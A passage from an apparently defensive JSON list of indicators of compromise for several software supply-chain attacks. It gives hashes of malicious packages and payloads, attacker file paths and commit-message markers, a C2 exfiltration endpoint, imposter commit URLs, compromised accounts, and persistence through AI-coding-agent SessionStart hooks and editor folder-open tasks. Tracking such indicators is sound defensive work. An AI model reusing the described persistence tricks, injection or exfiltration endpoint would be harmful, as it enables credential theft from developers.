"71e35aef03099cd1f2d6446734273025a163597de93912df321ef118bf135238",
"note": "litellm_init.pth", "incident":
"litellm"},

     
{"value":
"6cf223aea68b0e8031ff68251e30b6017a0513fe152e235c26f248ba1e15c92a",
"note": "sysmon.py (persistence)", "source":
"Hexastrike (confirmed)", "incident": ["litellm",
"telnyx"]}

    ],

   
"trivy_binaries": [

     
{"value":
"822dd269ec10459572dfaaefe163dae693c344249a0161953f0d5cdd110bd2a0",
"note": "Linux-64bit", "incident":
"trivy"},

     
{"value":
"f7084b0229dce605ccc5506b14acd4d954a496da4b6134a294844ca8d601970d",
"note": "Linux-32bit", "incident":
"trivy"},

     
{"value":
"bef7e2c5a92c4fa4af17791efc1e46311c0f304796f1172fce192f5efc40f5d7",
"note": "Linux-ARM", "incident":
"trivy"},

     
{"value":
"e64e152afe2c722d750f10259626f357cdea40420c5eedae37969fbf13abbecf",
"note": "Linux-ARM64", "incident":
"trivy"},

     
{"value":
"ecce7ae5ffc9f57bb70efd3ea136a2923f701334a8cd47d4fbf01a97fd22859c",
"note": "Linux-PPC64LE", "incident":
"trivy"},

     
{"value":
"d5edd791021b966fb6af0ace09319ace7b97d6642363ef27b3d5056ca654a94c",
"note": "Linux-s390x", "incident":
"trivy"},

     
{"value":
"e6310d8a003d7ac101a6b1cd39ff6c6a88ee454b767c1bdce143e04bc1113243",
"note": "macOS-64bit", "incident":
"trivy"},

     
{"value":
"6328a34b26a63423b555a61f89a6a0525a534e9c88584c815d937910f1ddd538",
"note": "macOS-ARM64", "incident":
"trivy"},

     
{"value":
"0880819ef821cff918960a39c1c1aada55a5593c61c608ea9215da858a86e349",
"note": "Windows-64bit", "incident":
"trivy"},

     
{"value":
"887e1f5b5b50162a60bd03b66269e0ae545d0aef0583c1c5b00972152ad7e073",
"note": "FreeBSD-64bit", "incident":
"trivy"}

    ],

   
"trivy_action_malware": [

     
{"value":
"18a24f83e807479438dcab7a1804c51a00dafc1d526698a66e0640d1e5dd671a",
"note": "entrypoint.sh (malicious)", "incident":
"trivy"}

    ],

   
"kics_openvsx": [

     
{"value":
"527f795a201a6bc114394c4cfd1c74dce97381989f51a4661aafbc93a4439e90",
"note": "environmentAuthChecker.js", "incident":
"checkmarx"},

     
{"value":
"65bd72fcddaf938cefdf55b3323ad29f649a65d4ddd6aea09afa974dfc7f105d",
"note": "[email protected]", "incident":
"checkmarx"},

     
{"value":
"744c9d61b66bcd2bb5474d9afeee6c00bb7e0cd32535781da188b80eb59383e0",
"note": "[email protected]", "incident":
"checkmarx"},

     
{"value":
"0d66d8c7e02574ff0d3443de0585af19c903d12466d88573ed82ec788655975c",
"note": "[email protected]", "incident":
"checkmarx"}

    ],

   
"checkmarx_jenkins_may9": [

     
{"value":
"01ff1e56fd59a8fa525d97e670f7f297a1a204331b89b2cd4e36a9abc6419203",
"type": "sha256", "note":
"checkmarx-ast-scanner-2026.5.09.hpi (malicious)",
"incident": "checkmarx-jenkins"},

     
{"value":
"f50a96d26a5b0beb29de4127e82b2bf350c21511e5a43d286e43f798dc6cd53f",
"type": "sha256", "note":
"checkmarx-ast-scanner-2026.5.09.jar (injected)",
"incident": "checkmarx-jenkins"},

     
{"value":
"3ddb8967919a801b3c383e58cddceab21138134c6a26560d99e2672e86f36f2a",
"type": "sha256", "note":
"checkmarx-ast-scanner-2026.5.09.pom", "incident":
"checkmarx-jenkins"},

     
{"value": "85487e68fc46fe3faec2617ac4f2ee5d",
"type": "md5", "note":
"checkmarx-ast-scanner.hpi v2026.5.09 (malicious)",
"incident": "checkmarx-jenkins"},

     
{"value": "1ac56ecda9a255c23eabd70c276905a0",
"type": "md5", "note":
"checkmarx-ast-scanner.jar (injected)", "incident":
"checkmarx-jenkins"},

     
{"value": "9f9f83795fc162b7e44bc6859fc80535",
"type": "md5", "note": "cli.js credential
stealer", "incident": "checkmarx-jenkins"},

     
{"value": "HeyEveryoneCheckmarxIsNotGonnaMakeIt",
"type": "string", "note": "Commit message
prefix for exfiltration", "incident": "checkmarx-jenkins"},

     
{"value": "/tmp/tmp.checkmarx_tracker.lock",
"type": "filepath", "note": "Lock file
(active infection indicator)", "incident": "checkmarx-jenkins"},

     
{"value": "~/hugs_from_teamPCP.txt",
"type": "filepath", "note": "Goodbye message
written on exception", "incident": "checkmarx-jenkins"}

    ],

   
"telnyx_packages": [

     
{"value":
"7321caa303fe96ded0492c747d2f353c4f7d17185656fe292ab0a59e2bd0b8d9",
"note": "telnyx-4.87.1.whl", "source":
"Hexastrike", "incident": "telnyx"},

     
{"value":
"f66c1ea3b25ec95d0c6a07be92c761551e543a7b256f9c78a2ff781c77df7093",
"note": "telnyx-4.87.1.tar.gz", "source":
"Hexastrike", "incident": "telnyx"},

     
{"value":
"cd08115806662469bbedec4b03f8427b97c8a4b3bc1442dc18b72b4e19395fe3",
"note": "telnyx-4.87.2.whl", "source":
"Hexastrike", "incident": "telnyx"},

     
{"value":
"a9235c0eb74a8e92e5a0150e055ee9dcdc6252a07785b6677a9ca831157833a5",
"note": "telnyx-4.87.2.tar.gz", "source":
"Hexastrike", "incident": "telnyx"}

    ],

   
"telnyx_malware": [

     
{"value":
"23b1ec58649170650110ecad96e5a9490d98146e105226a16d898fbe108139e5",
"note": "_client.py v4.87.1", "source":
"Hexastrike", "incident": "telnyx"},

     
{"value":
"ab4c4aebb52027bf3d2f6b2dcef593a1a2cff415774ea4711f7d6e0aa1451d4e",
"note": "_client.py v4.87.2", "source":
"Hexastrike", "incident": "telnyx"},

     
{"value":
"84edce66f09c55bbb44754411bde4b092288d172734df62fac20d6f794b3a2ec",
"note": "Linux Stage 2 loader (base64 decoded)",
"source": "Hexastrike", "incident":
"telnyx"},

     
{"value":
"5ce544a8db5d0b0953c966384858e4e8a017e7acba2f5f6d0ac8f529d59939d8",
"note": "Stage 3 credential harvester", "source":
"Hexastrike", "incident": "telnyx"},

     
{"value":
"196b5e0e06424a02e360e28e08d7dcfab7ec8946af9477ca352c6cf6b7d4e9bd",
"note": "Inner PE RAT (extracted)", "source":
"Hexastrike", "incident": "telnyx"},

     
{"value":
"e6912e3ec58120bf63edf2e4be6ff2f092c40cfbc655a12f4a463b2ef98d368e",
"note": "Embedded PNG steganography", "source":
"Hexastrike", "incident": "telnyx"},

     
{"value":
"e4e3b176c1255666024d90392e09466a23bf6e8740bf589c6d1ccf2dfff451a4",
"note": "Reflective PE loader shellcode",
"source": "Hexastrike", "incident":
"telnyx"}

    ],

   
"canisterworm_malware": [

     
{"value":
"e9b1e069efc778c1e77fb3f5fcc3bd3580bbc810604cbf4347897ddb4b8c163b",
"note": "index.js variant", "incident":
"canisterworm"},

     
{"value":
"61ff00a81b19624adaad425b9129ba2f312f4ab76fb5ddc2c628a5037d31a4ba",
"note": "index.js variant", "incident":
"canisterworm"},

     
{"value":
"0c0d206d5e68c0cf64d57ffa8bc5b1dad54f2dda52f24e96e02e237498cb9c3a",
"note": "index.js variant", "incident":
"canisterworm"},

     
{"value":
"c37c0ae9641d2e5329fcdee847a756bf1140fdb7f0b7c78a40fdc39055e7d926",
"note": "index.js variant", "incident":
"canisterworm"},

     
{"value":
"f398f06eefcd3558c38820a397e3193856e4e6e7c67f81ecc8e533275284b152",
"note": "deploy.js variant", "incident":
"canisterworm"},

     
{"value":
"7df6cef7ab9aae2ea08f2f872f6456b5d51d896ddda907a238cd6668ccdc4bb7",
"note": "deploy.js variant", "incident":
"canisterworm"},

     
{"value":
"5e2ba7c4c53fa6e0cef58011acdd50682cf83fb7b989712d2fcf1b5173bad956",
"note": "deploy.js variant", "incident":
"canisterworm"}

    ],

   
"staging_server_malware": [

     
{"value":
"81eda518ff6ebb25e6aa8d626b78cd2eb6cb38b5d7efb34e021289e76993414b",
"note": "MidwestGrey.exe (Windows PE dropper)",
"source": "LloydLabs", "incident":
"attacker"},

     
{"value":
"ea47cebe2fbbf06c22b9bd9b9d72dd4fe64aed4e68675aa5e693312a773e09e9",
"note": "kfhogts (Python trojan bundle)",
"source": "LloydLabs", "incident":
"attacker"}

    ],

   
"windows_payload": [

     
{"value":
"7290353a3bc2b18e9ea574d3294b09e28edaa6b038285bb101cf09760f187dcd",
"note": "msbuild.exe (outer PE)", "source":
"HackingLZ", "incident": "telnyx"},

     
{"value":
"dafc1cc5d39bc303562d8587b698b6351e843b77c01764efa8b423a36b88fa6d",
"note": "file.dll (AdaptixC2 beacon)", "source":
"HackingLZ", "incident": "telnyx"},

     
{"value":
"7e270255567866d37ad56e3f06977b695e39530eede74a10a0848ba71560cb45",
"note": "embedded PNG (stego)", "source":
"HackingLZ", "incident": "telnyx"},

     
{"value":
"b92bd082bbd7d238089b2bb87d9cbf01be1bf8ab7213b67e9d27108e052ef75c",
"note": "shellcode (loader + DLL)", "source":
"HackingLZ", "incident": "telnyx"},

     
{"value":
"26b689749bc57991cbae2aab8ab6cf5acab6c64db4829ba2b1ced6c60d99a7a8",
"note": "reflective loader stub", "source":
"HackingLZ", "incident": "telnyx"}

    ],

   
"certificates": [

     
{"value":
"30015dd1e2cf4dbd49fff9ddef2ad4622da2e60e5c0b6228595325532e948f14",
"note": "Self-signed certificate", "source":
"Unit42", "incident": "attacker"},

     
{"value":
"41c4f2f37c0b257d1e20fe167f2098da9d2e0a939b09ed3f63bc4fe010f8365c",
"note": "Self-signed certificate", "source":
"Unit42", "incident": "attacker"},

     
{"value":
"d8caf4581c9f0000c7568d78fb7d2e595ab36134e2346297d78615942cbbd727",
"note": "Self-signed certificate", "source":
"Unit42", "incident": "attacker"}

    ],

   
"kics_docker_april": [

     
{"value":
"24680027afadea90c7c713821e214b15cb6c922e67ac01109fb1edb3ee4741d9",
"note": "mcpAddon.js", "source":
"Socket", "incident": "kics-docker"},

     
{"value":
"2a6a35f06118ff7d61bfd36a5788557b695095e7c9a609b4a01956883f146f50",
"note": "kics ELF binary", "source":
"Socket", "incident": "kics-docker"}

    ],

   
"kics_docker_digests": [

     
{"value":
"sha256:2588a44890263a8185bd5d9fadb6bc9220b60245dbcbc4da35e1b62a6f8c230d",
"note": "Alpine index manifest", "source":
"Docker", "incident": "kics-docker"},

     
{"value":
"sha256:222e6bfed0f3bb1937bf5e719a2342871ccd683ff1c0cb967c8e31ea58beaf7b",
"note": "Debian index manifest", "source":
"Docker", "incident": "kics-docker"},

     
{"value":
"sha256:a0d9366f6f0166dcbf92fcdc98e1a03d2e6210e8d7e8573f74d50849130651a0",
"note": "Latest index manifest", "source":
"Docker", "incident": "kics-docker"}

    ],

   
"bitwarden_cli": [

     
{"value":
"18f784b3bc9a0bcdcb1a8d7f51bc5f54323fc40cbd874119354ab609bef6e4cb",
"note": "bw1.js (11.7 MB payload)", "source":
"N3mes1s", "incident": "bitwarden"},

     
{"value":
"f35475829991b303c5efc2ee0f343dd38f8614e8b5e69db683923135f85cf60d",
"note": "bw_setup.js (loader)", "source":
"N3mes1s", "incident": "bitwarden"},

     
{"value":
"8605e365edf11160aad517c7d79a3b26b62290e5072ef97b102a01ddbb343f14",
"note": "second-stage payload", "source":
"JFrog", "incident": "bitwarden"},

     
{"value":
"167ce57ef59a32a6a0ef4137785828077879092d7f83ddbc1755d6e69116e0ad",
"note": "package.json root metadata", "source":
"JFrog", "incident": "bitwarden"}

    ],

   
"mini_shai_hulud_dropper": [

     
{"value":
"4066781fa830224c8bbcc3aa005a396657f9c8f9016f9a64ad44a9d7f5f45e34",
"note": "setup.mjs (shared dropper)", "source":
"Socket", "incident": "mini-shai-hulud"}

    ],

   
"mini_shai_hulud_sap": [

     
{"value":
"eb6eb4154b03ec73218727dc643d26f4e14dfda2438112926bb5daf37ae8bcdb",
"note": "execution.js (@cap-js/postgres)",
"source": "Socket", "incident":
"mini-shai-hulud"},

     
{"value":
"1d9e4ece8e13c8eaf94cb858470d1bd8f81bb58f62583552303774fa1579edee",
"note": "@cap-js/postgres-2.2.2.tgz", "source":
"Wiz", "incident": "mini-shai-hulud"},

     
{"value":
"6f933d00b7d05678eb43c90963a80b8947c4ae6830182f89df31da9f568fea95",
"note": "execution.js (@cap-js/sqlite)",
"source": "Aikido", "incident":
"mini-shai-hulud"},

     
{"value":
"a1da198bb4e883d077a0e13351bf2c3acdea10497152292e873d79d4f7420211",
"note": "@cap-js/sqlite-2.2.2.tgz", "source":
"Wiz", "incident": "mini-shai-hulud"},

     
{"value":
"258257560fe2f1c2cc3924eae40718c829085b52ae3436b4e46d2565f6996271",
"note": "@cap-js/db-service-2.10.1.tgz",
"source": "Wiz", "incident":
"mini-shai-hulud"},

     
{"value":
"80a3d2877813968ef847ae73b5eeeb70b9435254e74d7f07d8cf4057f0a710ac",
"note": "execution.js (mbt)", "source":
"Socket", "incident": "mini-shai-hulud"},

     
{"value":
"86282ebcd3bebf50f087f2c6b00c62caa667cdcb53558033d85acd39e3d88b41",
"note": "mbt-1.2.48.tgz", "source":
"Wiz", "incident": "mini-shai-hulud"},

     
{"value":
"29ac906c8bd801dfe1cb39596197df49f80fff2270b3e7fbab52278c24e4f1a7",
"note": "memory dumper (Runner.Worker)",
"source": "Aikido", "incident":
"mini-shai-hulud"}

    ],

   
"mini_shai_hulud_intercom": [

     
{"value":
"50212a875643520353df158196b9b3be4595094125ad8d2d2c48bdd9cb04ce1f",
"note": "router_runtime.js (intercom-php)",
"source": "Socket", "incident":
"mini-shai-hulud"},

     
{"value":
"832a976d1a8d54e296e8479aedbd89fa24baa02b8409a78bf06d4d03340881bd",
"note": "setup-intercom.sh", "source":
"Socket", "incident": "mini-shai-hulud"},

     
{"value":
"b084743bd16043461e68b604dde80a8b386b405eae6f66c1103fb4fd6831d4a7",
"note": "composerPlugin.php", "source":
"Socket", "incident": "mini-shai-hulud"},

     
{"value":
"66664a49edbcee0ed0d8365839707916e92d3aa06e7f26f33c9dcc58e5fc1ef3",
"note": "intercom-intercom-php-5.0.2.zip",
"source": "Socket", "incident":
"mini-shai-hulud"},

     
{"value":
"907aec5b1288057a3e0885226918b6930a62a0f348ce23de026a683238c7903e",
"note": "composer.json (intercom-php)", "source":
"Socket", "incident": "mini-shai-hulud"}

    ],

   
"mini_shai_hulud_lightning": [

     
{"value":
"5f5852b5f604369945118937b058e49064612ac69826e0adadca39a357dfb5b1",
"note": "router_runtime.js (lightning 2.6.2/2.6.3)",
"source": "Lightning.ai", "incident":
"mini-shai-hulud"},

     
{"value":
"8046a11187c135da6959862ff3846e99ad15462d2ec8a2f77a30ad53ebd5dcf2",
"note": "start.py (loader)", "source":
"Lightning.ai", "incident": "mini-shai-hulud"}

    ],

   
"mini_shai_hulud_persistence": [

     
{"value":
"14eb4ce01dd4307759887ff819359b70d7d9ff709ecde039a5abc1aac325b128",
"note": ".claude/settings.json (SessionStart hook)",
"source": "Wiz", "incident":
"mini-shai-hulud"},

     
{"value":
"927387d0cfac1118df4b383decc2ea6ba49c9d2f98b47098bcbcba1efc026e1f",
"note": ".vscode/tasks.json (folderOpen task)",
"source": "Wiz", "incident":
"mini-shai-hulud"}

    ],

   
"xinference_packages": [

     
{"value":
"9d5bf42dedbefee145b9b3704d26b54668fd856f990299ec64f6b45b18e3f0bf",
"note": "xinference-2.6.0-py3-none-any.whl",
"incident": "xinference"},

     
{"value":
"96938e023f9ab0e963201522729a77e826b7bf336b1e5c972be76f8438ea4c1b",
"note": "xinference-2.6.1-py3-none-any.whl",
"incident": "xinference"},

     
{"value":
"06c88b286610e397ad22b8453b75ebf1e7bfe3b22c558577e17c39f21ef78a9c",
"note": "xinference-2.6.2-py3-none-any.whl",
"incident": "xinference"}

    ],

   
"mini_shai_hulud_2_malware": [

     
{"value":
"ab4fcadaec49c03278063dd269ea5eef82d24f2124a8e15d7b90f2fa8601266c",
"note": "router_init.js (2,341,681 bytes)",
"incident": "mini-shai-hulud-2"},

     
{"value":
"2ec78d556d696e208927cc503d48e4b5eb56b31abc2870c2ed2e98d6be27fc96",
"note": "router_init.js (2,339,346 bytes)",
"incident": "mini-shai-hulud-2"},

     
{"value":
"2258284d65f63829bd67eaba01ef6f1ada2f593f9bbe41678b2df360bd90d3df",
"note": "setup.mjs (5,047 bytes)", "incident":
"mini-shai-hulud-2"},

     
{"value":
"7c12d8614c624c70d6dd6fc2ee289332474abaa38f70ebe2cdef064923ca3a9b",
"note": "@tanstack/setup malicious package",
"source": "Mistral", "incident":
"mini-shai-hulud-2"},

     
{"value":
"6dbaa43bf2f3c0d3cddbca74967e952da563fb974c1ef9d4ecbb2e58e41fe81b",
"note": "mistralai-2.4.6.tar.gz (malicious sdist)",
"source": "Mistral GHSA", "incident":
"mini-shai-hulud-2"}

    ],

   
"mini_shai_hulud_2_persistence": [

     
{"value": "src/mistralai/client/__init__.py",
"type": "filepath", "note": "PyPI injection
point", "incident": "mini-shai-hulud-2"},

     
{"value": "/tmp/transformers.pyz", "type":
"filepath", "note": "downloaded payload path",
"incident": "mini-shai-hulud-2"},

     
{"value": "MISTRAL_INIT=1", "type":
"envvar", "note": "execution guard",
"incident": "mini-shai-hulud-2"}

    ],

   
"cemu_releases": [

     
{"value":
"0f35abda19fb69430c32228465396094b866d887427bf551e353ab31256a9dd6",
"note": "Cemu v2.6 AppImage (malicious)",
"source": "Datadog", "incident":
"cemu"},

     
{"value":
"d07a29c4458d00e42d5d9e6345932592e91644d6b821bacdb7a543c628e0b41a",
"note": "Cemu v2.6 AppImage binary", "source":
"Datadog", "incident": "cemu"},

     
{"value":
"f140e76236b96adf7cdc796227af9808665143bc674debb77729fa3e4b8327cc",
"note": "Cemu v2.6 Ubuntu zip (malicious)",
"source": "Datadog", "incident":
"cemu"},

     
{"value":
"1bf72f05191d849049d4a38fced2277ac5cfc54b7ae591f564e7a14add7c886d",
"note": "startup.pyz (Ubuntu variant)", "source":
"Datadog", "incident": "cemu"}

    ],

   
"cemu_persistence": [

     
{"value": "/tmp/.transformers", "type":
"filepath", "note": "two-stage execution sentinel
file", "incident": "cemu"},

     
{"value": "83.142.209.194/v1/weights",
"type": "url", "note": "C2 exfil
endpoint", "incident": "cemu"},

     
{"value": "python_mistral_cemu_files/",
"type": "filepath", "note": "payload module
directory in startup.pyz", "incident": "cemu"}

    ],

   
"antv_vscode": [

     
{"value":
"1a4afce34918bdc74ae3f31edaffffaa0ee074d83618f53edfd88137927340b8",
"note": "[email protected] VSIX",
"source": "StepSecurity", "incident":
"antv"},

     
{"value":
"b0cefb66b953e5184b6adb3035e9e267335ac5eabfe1848e07834777b9397b74",
"note": "malicious main.js", "source":
"StepSecurity", "incident": "antv"},

     
{"value":
"e7347d90653efc565f03733a95e9209d78f9cfa81e31ff2b2dd9d48d75a4b8b1",
"note": "obfuscated payload (index.js)",
"source": "StepSecurity", "incident":
"antv"},

     
{"value":
"43f2b001846c4966073ebffa5be8f15e491a1e7d32bbd805d57406ff540e0dd9",
"note": "dropper package.json", "source":
"StepSecurity", "incident": "antv"},

     
{"value":
"228a2cf081d4cbea9b91cde14a8f9c4a4d003e7f32431496953fd6bac266f5a3",
"note": "clean v18.94.0 (reference)", "source":
"StepSecurity", "incident": "antv"},

     
{"value":
"cb86f4f223daa54467c7782a0d8607e9c84e2bb633e6f0e51d9a19579e200990",
"note": "remediated v18.100.0", "source":
"StepSecurity", "incident": "antv"}

    ],

   
"antv_backdoor": [

     
{"value":
"fb5c97557230a27460fdab01fafcfabeaa49590bafd5b6ef30501aa9e0a51142",
"note": "~/.local/share/kitty/cat.py (SHA-256)",
"source": "Wiz", "incident": "antv"},

     
{"value":
"783b4019fc5b942a29846132d28441c8fc31bed8", "type":
"sha1", "note": "~/.local/share/kitty/cat.py",
"source": "Wiz", "incident": "antv"},

     
{"value": "b06b126b9e26af03a7ef2f8b8e90d446",
"type": "md5", "note":
"~/.local/share/kitty/cat.py", "source": "Wiz",
"incident": "antv"}

    ],

   
"antv_npm_payload": [

     
{"value":
"a68dd1e6a6e35ec3771e1f94fe796f55dfe65a2b94560516ff4ac189390dfa1c",
"note": "index.js payload (486-498KB obfuscated Bun
bundle)", "source": "SafeDep", "incident":
"antv"}

    ],

   
"durabletask_packages": [

     
{"value":
"7d80b3ef74ad7992b93c31966962612e4e2ceb93e7727cdbd1d2a9af47d44ba8",
"note": "durabletask-1.4.1", "source":
"Wiz", "incident": "durabletask"},

     
{"value":
"aeaf583e20347bf850e2fabdcd6f4982996ba023f8c2cd56bbd299cfd56516f5",
"note": "durabletask-1.4.2", "source":
"Wiz", "incident": "durabletask"},

     
{"value":
"877ff2531a63393c4cb9c3c86908b62d9c4fc3db971bc231c48537faae6cb3ec",
"note": "durabletask-1.4.3", "source":
"Wiz", "incident": "durabletask"}

    ],

   
"durabletask_malware": [

     
{"value":
"069ac1dc7f7649b76bc72a11ac700f373804bfd81dab7e561157b703999f44ce",
"note": "rope.pyz payload", "source":
"Wiz", "incident": "durabletask"}

    ],

   
"miasma_packages": [

     
{"value":
"88896d478986d453f5da79b311de39d9b4b1bea95c21af1d8ef181b0f4e52fe9",
"note": "@redhat-cloud-services/[email protected] tarball",
"source": "Socket", "incident":
"miasma"}

    ],

   
"miasma_malware": [

     
{"value":
"21b6409a7b84446310daca5409ad6112ac60a1e4bef97736e53fff5f63bfdef4",
"note": "index.js (obfuscated loader)", "source":
"Socket", "incident": "miasma"},

     
{"value":
"0dc06ecdaa63fe24859cfd955053c23245c536e4733480239d14bebf12688e35",
"note": "decrypted main payload", "source":
"Socket", "incident": "miasma"}

    ],

   
"miasma_persistence": [

     
{"value": ".claude/settings.json", "type":
"filepath", "note": "SessionStart hook →
.github/setup.js", "source": "BoostSecurity", "incident":
"miasma"},

     
{"value": ".vscode/tasks.json", "type":
"filepath", "note": "runOn: folderOpen task",
"source": "BoostSecurity", "incident":
"miasma"},

     
{"value": ".github/setup.js", "type":
"filepath", "note": "4.2 MB offline loader (4,215,480
bytes)", "source": "BoostSecurity", "incident":
"miasma"}

    ],

   
"elementary_data_packages": [

     
{"value":
"d37874c6c8a2d2a7a252810a1999ece8bb39e9b3ab2b7e8bf40da15bd36a1584",
"note": "elementary.pth (46 KB loader)",
"source": "Trend Micro", "incident":
"elementary-data"},

     
{"value":
"83f9b178b520d3ad8b49bc9ea2b454eacf64fc302ec42aff6f90a1245af299e9",
"note": "elementary-data-0.23.3 variant",
"source": "OSV", "incident":
"elementary-data"},

     
{"value":
"96dc65f67f54411d3de6b23a33a8f73665e2703d7261b7f1720cdc089c528eea",
"note": "elementary-data-0.23.3 variant",
"source": "OSV", "incident":
"elementary-data"},

     
{"value":
"fcb538f8a937dd2e97532899be80827772aa99f0523c582aef301682d6e96b75",
"note": "elementary-data-0.23.3 variant",
"source": "OSV", "incident":
"elementary-data"},

     
{"value":
"cc802c0d8b918c99b39f26f473e8090b7073d45268b399df2e2ff5d5549c2a37",
"note": "elementary-data-0.23.3 variant",
"source": "OSV", "incident":
"elementary-data"},

     
{"value":
"0bf22f5de2169f2f614c12aaecf586fd7a203cff41f4b79583963a30660a7019",
"note": "elementary-data-0.23.3 variant",
"source": "OSV", "incident":
"elementary-data"}

    ],

   
"elementary_data_artifacts": [

     
{"value":
"b1e4b1f3aad0d489ab0e9208031c67402bbb8480", "type":
"sha1", "note": "forged orphan Git commit",
"source": "StepSecurity", "incident":
"elementary-data"},

     
{"value":
"sha256:31ecc5939de6d24cf60c50d4ca26cf7a8c322db82a8ce4bd122ebd89cf634255",
"type": "digest", "note":
"ghcr.io/elementary-data/elementary:0.23.3 (malicious)",
"source": "Trend Micro", "incident":
"elementary-data"}

    ]

  },

  "github":
{

   
"imposter_commits": [

     
{"value": "actions/checkout @ 70379aad",
"url":
"https://github.com/actions/checkout/commit/70379aad1a8b40919ce8b382d3cd7d0315cde1d0",
"note": "→ rauchg", "incident":
"trivy"},

     
{"value": "aquasecurity/trivy @ 1885610c",
"url":
"https://github.com/aquasecurity/trivy/commit/1885610c6a34811c8296416ae69f568002ef11ec",
"note": "→ DmitriyLewen", "incident":
"trivy"},

     
{"value": "aquasecurity/trivy-action @ ddb9da44",
"url":
"https://github.com/aquasecurity/trivy-action/commit/ddb9da4475c1cef7d5389062bdfdfbdbd1394648",
"incident": "trivy"}

    ],

   
"lateral_movement": [

     
{"value": "aquasecurity/tfsec @ a67fd5b5",
"url":
"https://github.com/aquasecurity/tfsec/commit/a67fd5b5b119",
"incident": "trivy"},

     
{"value": "aquasecurity/traceeshark @ 56591dfe",
"url":
"https://github.com/aquasecurity/traceeshark/commit/56591dfe113b",
"incident": "trivy"},

     
{"value": "aquasecurity/trivy-action @ 93ed4111",
"url":
"https://github.com/aquasecurity/trivy-action/commit/93ed41111017c3767fafc7d9cc8711f3be1a661f",
"incident": "trivy"},

     
{"value": "aquasecurity/setup-trivy @ 8afa9b9f",
"url":
"https://github.com/aquasecurity/setup-trivy/commit/8afa9b9f9183b4e00c46e2b82d34047e3c177bd0",
"note": "→ thara", "incident": "trivy"}

    ],

   
"checkmarx_actions": [

     
{"value": "Checkmarx/kics-github-action @ 121c38f",
"url":
"https://github.com/Checkmarx/kics-github-action/commit/121c38f",
"incident": "checkmarx"},

     
{"value": "Checkmarx/ast-github-action @ aa52a82c",
"url":
"https://github.com/Checkmarx/ast-github-action/commit/aa52a82cddf2fa5ad54a519a0a56fd430264dbbe",
"feedback": "Tunahan TEKEOĞLU", "incident":
"checkmarx"},

     
{"value": "Checkmarx/kics @ 22769adb",
"url":
"https://github.com/Checkmarx/kics/commit/22769adb159bb5954adea5074e9763e8376201b3",
"note": "Gato-X secrets exfil workflow",
"incident": "kics-docker"},

     
{"value": "Checkmarx/ast-github-action PR#307",
"url":
"https://github.com/Checkmarx/ast-github-action/pull/307",
"note": "curl audit.checkmarx.cx pipe injection",
"incident": "kics-docker"}

    ],

   
"litellm_exfil": [

     
{"value": "BerriAI/litellm @ fcaa823d",
"url":
"https://github.com/BerriAI/litellm/commit/fcaa823de07878d0d98e97f6f5552c0e2ac00d2f",
"note": "test.yml", "incident":
"litellm"},

     
{"value": "BerriAI/litellm-skills @ 81c851cc",
"url":
"https://github.com/BerriAI/litellm-skills/commit/81c851cc00313c44effd421712523f294b18391e",
"note": "test.yml", "incident":
"litellm"}

    ],

   
"tanstack_attack": [

     
{"value": "zblgg/configuration", "url":
"https://github.com/zblgg/configuration", "note":
"renamed fork of TanStack/router", "incident": "mini-shai-hulud-2"},

     
{"value":
"79ac49eedf774dd4b0cfa308722bc463cfe5885c", "note":
"malicious commit hash", "incident":
"mini-shai-hulud-2"}

    ],

   
"compromised_accounts": [

     
{"value": "aqua-bot", "note": "ID:
54269356 — Trivy", "incident": "trivy"},

     
{"value": "Argon-DevOps-Mgt", "note":
"ID: 139343333 — aquasec-com defacement", "incident":
"trivy"},

     
{"value": "cx-plugins-releases", "note":
"ID: 225848595 — KICS", "incident": "checkmarx"},

     
{"value": "octocommit", "note": "ID:
266895321 — f.k.a. DarkSeek3r, renamed Mar 10", "incident":
"trivy"},

     
{"value": "ast-phoenix", "note":
"OpenVSX publisher", "incident": "checkmarx"},

     
{"value": "aDrupont4191", "note":
"Bitwarden CLI attack — deleted", "incident":
"bitwarden"},

     
{"value": "XprobeBot", "note": "PyPI
bot account — xinference (disputed)", "incident":
"xinference"},

     
{"value": "zblgg", "note": "ID:
127806521 — TanStack attack fork account", "incident":
"mini-shai-hulud-2"},

     
{"value": "voicproducoes", "note":
"ID: 269549300 — supply chain operator", "source":
"Hunt.io", "incident": "mini-shai-hulud-2"},

     
{"value": "atool", "note": "npm
maintainer account — AntV", "incident": "antv"},

     
{"value": "realtungtungtungsahur", "note":
"created Apr 22 — elementary-data script injection",
"incident": "elementary-data"}

    ],

   
"antv_imposter_commits": [

     
{"value": "antvis/G2 @
1916faa365f2788b6e193514872d51a242876569", "url":
"https://github.com/antvis/G2/commit/1916faa365f2788b6e193514872d51a242876569",
"note": "orphan commit (626 versions)",
"incident": "antv"},

     
{"value": "antvis/G2 @
7cb42f57561c321ecb09b4552802ae0ac55b3a7a", "url":
"https://github.com/antvis/G2/commit/7cb42f57561c321ecb09b4552802ae0ac55b3a7a",
"note": "orphan commit (2 versions)", "incident":
"antv"},

     
{"value": "antvis/G2 @
dc3d62a2181beb9f326952a2d212900c94f2e13d", "url":
"https://github.com/antvis/G2/commit/dc3d62a2181beb9f326952a2d212900c94f2e13d",
"note": "orphan commit (1 version, garbage-collected)",
"incident": "antv"}

    ],

   
"antv_vscode_commits": [

     
{"value":
"558b09d7ad0d1660e2a0fb8a06da81a6f42e06d2", "note":
"Nx Console orphan commit", "incident": "antv"},

     
{"value":
"ba642fe2c7c65e42dd7f6444b83023dc6827e08c", "note":
"commit tree", "incident": "antv"},

     
{"value":
"acfc3f957a63b4cde93ff645f2b6bf26a8ed1bbf", "note":
"index.js blob", "incident": "antv"},

     
{"value":
"9d88f040c44b5f4d5f9db15ff89310776c168e99", "note":
"package.json blob", "incident": "antv"}

    ],

   
"antv_actions": [

     
{"value": "actions-cool/issues-helper",
"note": "53 tags compromised (19:10:24-19:13:40 UTC)",
"incident": "antv"},

     
{"value": "actions-cool/maintain-one-comment",
"note": "15 tags compromised (19:30:30-19:31:09 UTC)",
"incident": "antv"},

     
{"value":
"1c9e803c80cc7fed000022d4c94f4b5bc2e90062", "note":
"issues-helper v3.8.0 malicious commit", "incident":
"antv"},

     
{"value":
"f0448c62fc57b8a5ce23d8acd6e795cdd76a3b6c", "note":
"issues-helper v3.7.6 malicious commit", "incident":
"antv"},

     
{"value":
"b9c83f01929e190cda300e76f688bf7ea7e37a7a", "note":
"issues-helper v3.0.0 malicious commit", "incident":
"antv"}

    ],

   
"container_images": [

     
{"value": "ghcr.io/aquasecurity/trivy:0.69.4",
"note": "~3hr exposure", "incident":
"trivy"},

     
{"value": "docker.io/aquasec/trivy:0.69.4",
"note": "~3hr exposure", "incident":
"trivy"},

     
{"value":
